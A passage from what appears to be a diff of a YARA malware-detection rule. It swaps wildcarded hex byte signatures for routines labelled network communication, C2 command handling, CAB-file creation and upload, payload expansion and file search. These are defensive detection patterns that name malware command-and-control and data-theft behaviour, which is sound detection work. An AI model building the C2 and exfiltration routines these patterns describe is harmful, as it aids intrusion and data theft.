?? 8B D8 8B C3 - E8 ?? ?? ?? ?? 8B F0 8B D6 8B CB 8B 45 ?? 8B 38 FF 57 ?? 89 45 ?? 8B 45 ?? 8B 10 FF - 12 52 50 8B 45 ?? E8 ?? ?? ?? ?? 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 72 ?? EB ?? 5A 58 - 7C ?? 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? - 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 - ?? ?? ?? ?? 52 50 8B C3 99 29 04 24 19 54 24 ?? 58 5A 52 50 8B 45 ?? E8 ?? ?? ?? ?? - 8B D6 8B 4D ?? 8B 45 ?? 8B 38 FF 57 ?? 8B C3 99 29 45 ?? 19 55 ?? 8B D3 8B C6 E8 ?? - ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? EB ?? 0F 8F ?? ?? ?? ?? A1 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B - 48 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 8B 00 8B 80 ?? - ?? ?? ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 18 FF 53 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 - C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB - ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? - ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? - EB ?? 5F 5E 5B 8B E5 5D C3 + $network_communication_p1 = { + 48 8B C4 53 55 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 3D ?? ?? ?? ?? 45 33 FF + 48 8B D9 4C 8D A7 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 49 8B CC 44 89 78 ?? 44 89 78 + ?? 45 8B F7 44 89 78 ?? 41 8B EF E8 ?? ?? ?? ?? 4C 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? + ?? ?? BA ?? ?? ?? ?? 49 8B CC 48 89 5C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 9F + ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 45 33 C9 45 33 C0 33 C9 41 8B + D5 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 48 85 C0 75 ?? 83 C8 ?? + 48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5D 5B C3 4C 89 7C 24 ?? 44 89 7C 24 ?? 41 B8 + ?? ?? ?? ?? 45 33 C9 48 8B D3 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? + ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 + C0 0F 84 ?? ?? ?? ?? 4C 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 + 33 C9 4D 8B C4 48 8B C8 4C 89 7C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 + ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 45 33 C9 45 33 C0 33 D2 48 8B C8 44 89 + 7C 24 ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 48 8B CB 85 C0 74 ?? 48 8D 94 24 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 48 8B CB 45 33 C0 33 D2 FF 15 ?? ?? ?? + ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? + 41 8B C5 E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB EB ?? FF C0 B9 ?? + ?? ?? ?? 8B D0 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 74 ?? 44 8B } - $search_files = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D - ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 55 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 - 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B - 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 0F 94 C3 E9 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 66 83 38 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 85 C0 75 ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? - ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0D ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 - 83 38 ?? 74 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 75 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 94 C3 84 DB 0F 85 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 8B D8 4B 85 DB 7C ?? - 43 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C6 8B 38 FF - 57 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 4B 75 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 - 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + $network_communication_p2 = { + 84 24 ?? ?? ?? ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8D 0D ?? + ?? ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 4C 8B E8 48 8B CB 48 83 F8 ?? 75 ?? 45 33 C9 45 33 C0 33 D2 FF 15 + ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? + ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 + 8B D4 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 1F 00 44 39 BC 24 + ?? ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 49 8B CC 41 8B EF E8 ?? ?? ?? ?? 48 85 C0 0F + 45 EF 3B EF 74 ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 49 8B CD + 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 44 03 B4 24 ?? ?? ?? ?? 33 + D2 49 8B CC E8 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 + 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B CD FF 15 ?? + ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 48 8B CB FF 15 ?? ?? ?? + ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? + 83 C8 ?? 45 85 F6 0F 44 E8 8B C5 48 8B B4 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41 + 5D 41 5C 5F 5D 5B C3 + } + $handle_c2_commands_p1 = { + 48 89 5C 24 ?? 48 89 74 24 ?? 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 + 48 89 84 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 8D 54 24 ?? 33 FF 48 8B CE 89 7C 24 + ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? + ?? ?? 48 8B 08 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B + ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 75 ?? 48 8B 4B ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 41 B8 + ?? ?? ?? ?? 66 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? + 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 53 ?? 48 8D 0D ?? + ?? ?? ?? 45 33 C0 FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? + ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 + 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 + } + $handle_c2_commands_p2 = { + 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 + ?? ?? ?? ?? 48 8B CE 85 C0 75 ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 D2 E8 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 0B E8 ?? ?? ?? ?? 48 63 4C 24 ?? + 48 8B 15 ?? ?? ?? ?? 48 8B 4C CB ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 63 4C + 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 3B 48 83 + C9 ?? 33 C0 66 F2 AF 33 D2 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? 48 8B 3B 48 83 + C9 ?? 33 C0 66 F2 AF 8D 50 ?? 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? + ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 48 8B CB FF 15 ?? ?? ?? ?? + 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B + 5B ?? 49 8B 73 ?? 49 8B E3 5F C3 + } + $create_cab_file_and_upload_p1 = { + 48 89 5C 24 ?? 55 56 57 41 54 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 + 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? 33 DB 48 8B F1 + 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? 44 8B E3 89 5C 24 ?? 89 5C 24 ?? 66 89 5D ?? E8 + ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 9D ?? ?? 00 00 E8 ?? + ?? ?? ?? 33 C0 48 8D 4C 24 ?? 66 89 5C 24 ?? 48 89 44 24 ?? 89 44 24 ?? 66 89 44 24 + ?? FF 15 ?? ?? ?? ?? 0F B7 54 24 ?? 0F B7 4C 24 ?? 44 0F B7 44 24 ?? 0F B7 44 24 ?? + 0F B7 7C 24 ?? 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 7C 24 ?? 44 89 44 24 ?? 4C 8D + 05 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? B9 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 4C 8D 4D ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 45 33 C0 FF 15 ?? ?? ?? + ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 53 ?? 48 8B CE E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? + ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? + ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D + 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 + ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 + } + $create_cab_file_and_upload_p2 = { + 8D 4D ?? 48 8B D6 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 48 8D 55 ?? 45 + 33 C0 48 8B CE FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 48 8D 4D ?? 45 8D 41 ?? BA + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 ?? 75 ?? 8B C3 EB ?? 33 D2 48 8B C8 + FF 15 ?? ?? ?? ?? 8B F0 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B C3 EB ?? FF C6 B9 + ?? ?? ?? ?? 8B D6 44 8B EE FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 75 ?? 48 8B CF FF 15 + ?? ?? ?? ?? 8B C3 EB ?? 4D 8B C5 33 D2 48 8B C8 E8 ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B + C6 49 8B D4 48 8B CF 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B + 44 24 ?? 89 44 24 ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8D 4D ?? 4C 89 B4 24 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 44 8B 6C 24 ?? B9 ?? ?? ?? ?? 41 83 C5 ?? 41 8B FD 41 8B + D5 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B C7 33 + D2 48 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33 + C0 48 83 C9 ?? 4C 8D 86 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 66 F2 AF 49 89 00 49 89 40 + ?? 48 F7 D1 49 89 40 ?? 49 89 40 ?? 48 FF C9 03 C9 74 ?? 8B D1 48 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? EB ?? 48 8B F3 49 89 B7 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 44 8B + } + $create_cab_file_and_upload_p3 = { + 44 24 ?? 4D 8B CE 49 8B D4 48 8B CE 44 89 6C 24 ?? E8 ?? ?? ?? ?? 49 8B 8F ?? ?? ?? + ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 49 8B CC 49 89 9F ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 + 83 C9 ?? 33 C0 48 8D BD ?? ?? ?? ?? 66 F2 AF 48 F7 D1 41 8D 84 4D ?? ?? ?? ?? B9 ?? + ?? ?? ?? 8B D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 44 + 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 8B 54 24 ?? 4C 8D 8D ?? ?? ?? ?? 4C 8D 05 + ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B D6 8B C8 4C 8B C7 89 44 24 + ?? 49 03 CD E8 ?? ?? ?? ?? 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 03 CF 41 B8 ?? ?? ?? + ?? 49 03 CD E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? E8 ?? ?? + ?? ?? 45 33 C9 45 33 C0 41 8D 51 ?? 33 C9 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 + 85 C0 0F 84 ?? ?? ?? ?? 48 89 5C 24 ?? 89 5C 24 ?? 49 8D 97 ?? ?? ?? ?? 41 B8 ?? ?? + ?? ?? 45 33 C9 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 + ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 0F 84 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? 33 D2 + 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4D 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 49 8D 8F + ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 7C 24 ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? C7 44 24 ?? + ?? ?? ?? ?? 4D 8D 87 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 33 C9 49 8B CC 48 89 5C 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 + } + $create_cab_file_and_upload_p4 = { + 8B 44 24 ?? 48 8D 15 ?? ?? ?? ?? 4D 8B CD 41 B8 ?? ?? ?? ?? 48 8B CF 89 44 24 ?? FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 45 33 C9 45 33 + C0 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? + ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? + ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? FF C0 B9 ?? ?? ?? ?? 8B + D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 + 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B + CE FF 15 ?? ?? ?? ?? 83 C8 ?? EB ?? 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 44 + 8B 44 24 ?? 4C 8D 4C 24 ?? 49 8B D5 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 + ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? + 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B + CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 8B C3 4C 8B B4 24 ?? ?? ?? ?? 4C 8B + AC 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? + ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5C 5F 5E 5D C3 + } + $cmd_expand_payload_p1 = { + 40 53 55 41 55 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? + ?? ?? 48 8B E9 48 8D 8C 24 ?? ?? ?? ?? 45 33 ED 33 D2 41 B8 ?? ?? ?? ?? 66 44 89 AC + 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 44 + 89 AC 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 45 8D 45 ?? 48 8D 4C 24 ?? 33 D2 44 89 6C 24 ?? + E8 ?? ?? ?? ?? 33 C0 4C 89 6C 24 ?? 45 8D 45 ?? 45 33 C9 BA ?? ?? ?? ?? 48 8B CD C7 + 44 24 ?? ?? ?? ?? ?? 4C 89 6C 24 ?? 48 89 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 45 33 C9 33 + D2 48 8B C8 45 8D 41 ?? 4C 89 6C 24 ?? 48 89 BC 24 ?? ?? ?? ?? 44 89 6C 24 ?? FF 15 + ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? + ?? 45 33 C9 45 33 C0 48 8B C8 41 8D 51 ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 6C 24 ?? FF + 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? + ?? ?? 4C 8D 40 ?? 48 8D 84 24 ?? ?? ?? ?? 41 83 C9 ?? 33 D2 33 C9 C7 44 24 ?? ?? ?? + ?? ?? 48 89 44 24 ?? 4C 89 A4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? + 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 } - $remote_connection = { - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? - 8D 4D ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 08 FF - 51 ?? 8B 45 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? - 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 - 89 20 6A ?? 8D 45 ?? 50 8D 4D ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? - 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? - 8B 45 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 74 ?? C7 45 ?? ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 83 EB ?? 8B 1B 68 ?? ?? ?? ?? 8B CB - BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8D 45 - ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 45 - ?? 8B 90 ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 8B CE BA ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 - 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 + $cmd_expand_payload_p2 = { + 44 8B 66 ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? + ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? + ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 8B CD BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24 + ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 4C + 89 6C 24 ?? 4C 89 6C 24 ?? 45 33 C0 33 C9 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? 66 44 89 AC 24 ?? ?? 00 00 44 89 6C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 + ?? EB ?? 90 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 4C 89 6C 24 ?? 48 8D 0D ?? ?? + ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CB + FF 